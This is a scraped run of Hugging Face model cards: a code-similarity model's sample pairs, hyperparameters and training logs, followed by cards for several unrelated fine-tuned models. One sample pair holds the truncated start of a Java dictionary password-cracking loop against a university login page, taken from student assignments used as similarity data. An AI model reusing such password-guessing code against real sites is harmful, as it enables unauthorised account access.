|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>1</code> |
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> | <code>0</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code>1</code> |
* Loss: [<code>ContrastiveLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#contrastiveloss) with these parameters:
```json
{
"distance_metric": "SiameseDistanceMetric.COSINE_DISTANCE",
"margin": 0.5,
"size_average": true
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
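As a rough sketch, these non-default values correspond to the following `SentenceTransformerTrainingArguments`; the output directory is a placeholder.

```python
from sentence_transformers import SentenceTransformerTrainingArguments
from sentence_transformers.training_args import BatchSamplers

args = SentenceTransformerTrainingArguments(
    output_dir="output/placeholder",  # placeholder
    eval_strategy="steps",
    per_device_train_batch_size=16,
    per_device_eval_batch_size=16,
    learning_rate=2e-5,
    num_train_epochs=1,
    warmup_ratio=0.1,
    fp16=True,
    batch_sampler=BatchSamplers.NO_DUPLICATES,
)
```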
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss | binary-classification-evaluator_cosine_ap |
|:------:|:----:|:-------------:|:---------------:|:-----------------------------------------:|
| 0.0207 | 100 | 0.0203 | - | - |
| 0.0414 | 200 | 0.0079 | - | - |
| 0.0621 | 300 | 0.0032 | - | - |
| 0.0828 | 400 | 0.0018 | - | - |
| 0.1035 | 500 | 0.001 | 0.0007 | 0.9999 |
| 0.1241 | 600 | 0.0007 | - | - |
| 0.1448 | 700 | 0.0005 | - | - |
| 0.1655 | 800 | 0.0006 | - | - |
| 0.1862 | 900 | 0.0004 | - | - |
| 0.2069 | 1000 | 0.0006 | 0.0003 | 1.0000 |
| 0.2276 | 1100 | 0.0005 | - | - |
| 0.2483 | 1200 | 0.0002 | - | - |
| 0.2690 | 1300 | 0.0004 | - | - |
| 0.2897 | 1400 | 0.0004 | - | - |
| 0.3104 | 1500 | 0.0004 | 0.0002 | 1.0000 |
| 0.3311 | 1600 | 0.0002 | - | - |
| 0.3517 | 1700 | 0.0004 | - | - |
| 0.3724 | 1800 | 0.0003 | - | - |
| 0.3931 | 1900 | 0.0002 | - | - |
| 0.4138 | 2000 | 0.0004 | 0.0002 | 1.0000 |
| 0.4345 | 2100 | 0.0001 | - | - |
| 0.4552 | 2200 | 0.0003 | - | - |
| 0.4759 | 2300 | 0.0002 | - | - |
| 0.4966 | 2400 | 0.0004 | - | - |
| 0.5173 | 2500 | 0.0003 | 0.0002 | 0.9999 |
| 0.5380 | 2600 | 0.0001 | - | - |
| 0.5587 | 2700 | 0.0003 | - | - |
| 0.5794 | 2800 | 0.0004 | - | - |
| 0.6000 | 2900 | 0.0002 | - | - |
| 0.6207 | 3000 | 0.0003 | 0.0002 | 1.0000 |
| 0.6414 | 3100 | 0.0003 | - | - |
| 0.6621 | 3200 | 0.0002 | - | - |
| 0.6828 | 3300 | 0.0004 | - | - |
| 0.7035 | 3400 | 0.0003 | - | - |
| 0.7242 | 3500 | 0.0004 | 0.0002 | 1.0000 |
| 0.7449 | 3600 | 0.0002 | - | - |
| 0.7656 | 3700 | 0.0002 | - | - |
| 0.7863 | 3800 | 0.0003 | - | - |
| 0.8070 | 3900 | 0.0003 | - | - |
| 0.8276 | 4000 | 0.0002 | 0.0001 | 1.0000 |
| 0.8483 | 4100 | 0.0002 | - | - |
| 0.8690 | 4200 | 0.0003 | - | - |
| 0.8897 | 4300 | 0.0002 | - | - |
| 0.9104 | 4400 | 0.0003 | - | - |
| 0.9311 | 4500 | 0.0002 | 0.0002 | 1.0000 |
| 0.9518 | 4600 | 0.0001 | - | - |
| 0.9725 | 4700 | 0.0005 | - | - |
| 0.9932 | 4800 | 0.0004 | - | - |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### ContrastiveLoss
```bibtex
@inproceedings{hadsell2006dimensionality,
author={Hadsell, R. and Chopra, S. and LeCun, Y.},
booktitle={2006 IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR'06)},
title={Dimensionality Reduction by Learning an Invariant Mapping},
year={2006},
volume={2},
number={},
pages={1735-1742},
doi={10.1109/CVPR.2006.100}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
thefirstgoku/23SEP_inter_v32_2
|
thefirstgoku
| 2025-09-23T15:13:19Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:12:27Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26-gguf
|
dsaedi
| 2025-09-23T15:12:12Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-23T15:10:46Z |
---
base_model: unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** dsaedi
- **License:** apache-2.0
- **Finetuned from model :** unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
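Since this repository ships GGUF weights, they can be loaded with llama.cpp-compatible tooling. A minimal sketch with llama-cpp-python follows; the filename pattern is an assumption, so check the repository's file list for the exact `.gguf` name.

```python
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26-gguf",
    filename="*.gguf",  # assumption: pick the actual quantization file from the repo
    n_ctx=4096,
)
out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Hello! What can you help me with?"}]
)
print(out["choices"][0]["message"]["content"])
```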
|
galuis116/d8903828-ba96-481a-adf8-47390d201f08
|
galuis116
| 2025-09-23T15:10:11Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:JackFram/llama-68m",
"base_model:adapter:JackFram/llama-68m",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T15:06:15Z |
---
library_name: peft
license: apache-2.0
base_model: JackFram/llama-68m
tags:
- axolotl
- generated_from_trainer
model-index:
- name: d8903828-ba96-481a-adf8-47390d201f08
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
adapter: lora
base_model: JackFram/llama-68m
bf16: auto
chat_template: llama3
dataset_prepared_path: null
datasets:
- data_files:
- a5bbbac5a2471507_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruction
field_output: output
field_system: system
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 4
flash_attention: false
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: false
group_by_length: false
hub_model_id: galuis116/d8903828-ba96-481a-adf8-47390d201f08
learning_rate: 0.0002
load_in_4bit: false
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 16
lora_dropout: 0.05
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 8
lora_target_linear: true
lr_scheduler: cosine
max_steps: 10
micro_batch_size: 2
mlflow_experiment_name: /tmp/a5bbbac5a2471507_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 1
optimizer: adamw_bnb_8bit
output_dir: /root/.cache/huggingface/hub/trained_repo
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 4
sequence_len: 512
special_tokens:
pad_token: </s>
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: offline
wandb_name: ab8881fc-876a-4c27-baf1-43fc45edba93
wandb_project: Gradients-On-Demand
wandb_run: your_name
wandb_runid: ab8881fc-876a-4c27-baf1-43fc45edba93
warmup_steps: 10
weight_decay: 0.0
xformers_attention: null
```
</details><br>
# d8903828-ba96-481a-adf8-47390d201f08
This model is a fine-tuned version of [JackFram/llama-68m](https://huggingface.co/JackFram/llama-68m) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.0889
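A minimal sketch of loading the LoRA adapter on top of the base model for inference (the prompt and generation settings are illustrative):

```python
import torch
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base = AutoModelForCausalLM.from_pretrained("JackFram/llama-68m", torch_dtype=torch.float32)
model = PeftModel.from_pretrained(base, "galuis116/d8903828-ba96-481a-adf8-47390d201f08")
tokenizer = AutoTokenizer.from_pretrained("JackFram/llama-68m")

inputs = tokenizer("Hello, how are you?", return_tensors="pt")
output_ids = model.generate(**inputs, max_new_tokens=32)
print(tokenizer.decode(output_ids[0], skip_special_tokens=True))
```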
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- training_steps: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 2.6474 | 0.0003 | 1 | 3.1180 |
| 3.1686 | 0.0010 | 3 | 3.1174 |
| 2.7322 | 0.0019 | 6 | 3.1088 |
| 2.6913 | 0.0029 | 9 | 3.0889 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1
|
SudoInstallAI/Qwen-Image-Edit_GGUF-Workflow
|
SudoInstallAI
| 2025-09-23T15:09:30Z | 0 | 3 | null |
[
"ComfyUI",
"Workflow",
"en",
"base_model:Qwen/Qwen-Image-Edit",
"base_model:finetune:Qwen/Qwen-Image-Edit",
"region:us"
] | null | 2025-08-20T02:39:32Z |
---
language:
- en
base_model:
- Qwen/Qwen-Image-Edit
tags:
- ComfyUI
- Workflow
---
# Qwen Image Edit GGUF Workflow
ComfyUI Workflow for Qwen Image Edit GGUF using the Lightx2v 4-step Lightning LoRA.
- (23/09) Added the Qwen Image Edit 2509 Multi-image Input Workflow
- (09/08) Added the inpainting version of the workflow, to be used with the inpainting LoRA model from Ostris.
[Download the Ostris Inpainting LoRA here](https://huggingface.co/ostris/qwen_image_edit_inpainting)
|
Youseff1987/qwen-3-4b-instruct-2507-translate-2509-lora
|
Youseff1987
| 2025-09-23T15:08:18Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:08:04Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Youseff1987
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
|
csikasote
| 2025-09-23T15:08:01Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"bemgen",
"mms",
"generated_from_trainer",
"base_model:facebook/mms-1b-all",
"base_model:finetune:facebook/mms-1b-all",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-23T14:10:40Z |
---
library_name: transformers
license: cc-by-nc-4.0
base_model: facebook/mms-1b-all
tags:
- automatic-speech-recognition
- bemgen
- mms
- generated_from_trainer
model-index:
- name: mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
This model is a fine-tuned version of [facebook/mms-1b-all](https://huggingface.co/facebook/mms-1b-all) on the BEMGEN - BEM dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2762
- Cer: 0.0799
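A minimal inference sketch with the Transformers ASR pipeline; the audio path is a placeholder, and 16 kHz mono audio is assumed:

```python
from transformers import pipeline

asr = pipeline(
    "automatic-speech-recognition",
    model="csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9",
)
print(asr("sample_bemba.wav")["text"])  # placeholder audio file (16 kHz mono)
```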
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 4
- seed: 52
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 30.0
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Cer |
|:-------------:|:-------:|:----:|:---------------:|:------:|
| 7.5096 | 0.6711 | 100 | 2.8165 | 0.9938 |
| 2.4125 | 1.3423 | 200 | 0.4848 | 0.1492 |
| 1.4033 | 2.0134 | 300 | 0.3584 | 0.1053 |
| 1.2952 | 2.6846 | 400 | 0.3348 | 0.0977 |
| 1.2179 | 3.3557 | 500 | 0.3055 | 0.0878 |
| 1.1866 | 4.0268 | 600 | 0.2916 | 0.0830 |
| 1.1662 | 4.6980 | 700 | 0.2906 | 0.0856 |
| 1.1626 | 5.3691 | 800 | 0.2853 | 0.0818 |
| 1.2508 | 6.0403 | 900 | 0.2824 | 0.0805 |
| 1.2534 | 6.7114 | 1000 | 0.2814 | 0.0801 |
| 1.2901 | 7.3826 | 1100 | 0.2807 | 0.0798 |
| 1.2177 | 8.0537 | 1200 | 0.2762 | 0.0800 |
| 1.13 | 8.7248 | 1300 | 0.2736 | 0.0788 |
| 1.2379 | 9.3960 | 1400 | 0.2718 | 0.0777 |
| 1.0842 | 10.0671 | 1500 | 0.2699 | 0.0765 |
| 1.1996 | 10.7383 | 1600 | 0.2703 | 0.0759 |
| 1.17 | 11.4094 | 1700 | 0.2676 | 0.0746 |
| 1.1867 | 12.0805 | 1800 | 0.2664 | 0.0747 |
| 1.1887 | 12.7517 | 1900 | 0.2692 | 0.0768 |
| 1.1212 | 13.4228 | 2000 | 0.2664 | 0.0755 |
| 1.0755 | 14.0940 | 2100 | 0.2696 | 0.0755 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.0
|
MrEzzat/Spark_TTS_Arabic
|
MrEzzat
| 2025-09-23T15:07:48Z | 1 | 2 | null |
[
"safetensors",
"text-to-speech",
"en",
"zh",
"ar",
"dataset:MBZUAI/ArVoice",
"dataset:mozilla-foundation/common_voice_17_0",
"arxiv:2503.01710",
"base_model:SparkAudio/Spark-TTS-0.5B",
"base_model:finetune:SparkAudio/Spark-TTS-0.5B",
"license:cc-by-nc-sa-4.0",
"region:us"
] |
text-to-speech
| 2025-09-22T22:47:24Z |
---
license: cc-by-nc-sa-4.0
language:
- en
- zh
- ar
tags:
- text-to-speech
library_tag: spark-tts
base_model:
- SparkAudio/Spark-TTS-0.5B
pipeline_tag: text-to-speech
datasets:
- MBZUAI/ArVoice
- mozilla-foundation/common_voice_17_0
---
## Spark-TTS 🔥
### 👉🏻 [Spark-TTS Demos](https://sparkaudio.github.io/spark-tts/) 👈🏻
### 👉🏻 [Github Repo](https://github.com/SparkAudio/Spark-TTS) 👈🏻
### 👉🏻 [Paper](https://arxiv.org/pdf/2503.01710) 👈🏻
### Overview
Spark-TTS is an advanced text-to-speech system that uses the power of large language models (LLMs) for highly accurate and natural-sounding voice synthesis. It is designed to be efficient, flexible, and powerful for both research and production use.
---
<table align="center">
<tr>
<td align="center"><b>Inference Overview of Voice Cloning</b><br><img src="src/figures/infer_voice_cloning.png" width="80%" /></td>
</tr>
<tr>
<td align="center"><b>Inference Overview of Controlled Generation</b><br><img src="src/figures/infer_control.png" width="80%" /></td>
</tr>
</table>
## Install
**Clone and Install**
- Clone the repo
``` sh
git clone https://github.com/SparkAudio/Spark-TTS.git
cd Spark-TTS
```
- Install Conda: please see https://docs.conda.io/en/latest/miniconda.html
- Create Conda env:
``` sh
conda create -n sparktts -y python=3.12
conda activate sparktts
pip install -r requirements.txt
```
**Model Download**
Download via python:
```python
from huggingface_hub import snapshot_download
snapshot_download("MrEzzat/Spark_TTS_Arabic", local_dir="pretrained_models/Spark-TTS-0.5B")
```
Download via git clone:
```sh
mkdir -p pretrained_models
# Make sure you have git-lfs installed (https://git-lfs.com)
git lfs install
git clone https://huggingface.co/MrEzzat/Spark_TTS_Arabic
```
**Basic Usage**
You can simply run the demo with the following commands:
``` sh
cd example
bash infer.sh
```
Alternatively, you can directly execute the following command in the command line to perform inference:
``` sh
python -m cli.inference \
--text "text to synthesis." \
--device 0 \
--save_dir "path/to/save/audio" \
--model_dir pretrained_models/Spark-TTS-0.5B \
--prompt_text "transcript of the prompt audio" \
--prompt_speech_path "path/to/prompt_audio"
```
**UI Usage**
You can start the UI interface by running `python webui.py`, which allows you to perform Voice Cloning and Voice Creation. Voice Cloning supports uploading reference audio or directly recording the audio.
| **Voice Cloning** | **Voice Creation** |
|:-------------------:|:-------------------:|
|  |  |
## Citation
```
@misc{wang2025sparktts,
title={Spark-TTS: An Efficient LLM-Based Text-to-Speech Model with Single-Stream Decoupled Speech Tokens},
author={Xinsheng Wang and Mingqi Jiang and Ziyang Ma and Ziyu Zhang and Songxiang Liu and Linqin Li and Zheng Liang and Qixi Zheng and Rui Wang and Xiaoqin Feng and Weizhen Bian and Zhen Ye and Sitong Cheng and Ruibin Yuan and Zhixian Zhao and Xinfa Zhu and Jiahao Pan and Liumeng Xue and Pengcheng Zhu and Yunlin Chen and Zhifei Li and Xie Chen and Lei Xie and Yike Guo and Wei Xue},
year={2025},
eprint={2503.01710},
archivePrefix={arXiv},
primaryClass={cs.SD},
url={https://arxiv.org/abs/2503.01710},
}
```
|
dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26
|
dsaedi
| 2025-09-23T15:06:36Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:06:25Z |
---
base_model: unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** dsaedi
- **License:** apache-2.0
- **Finetuned from model :** unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
dinolab/blockassist
|
dinolab
| 2025-09-23T15:05:56Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
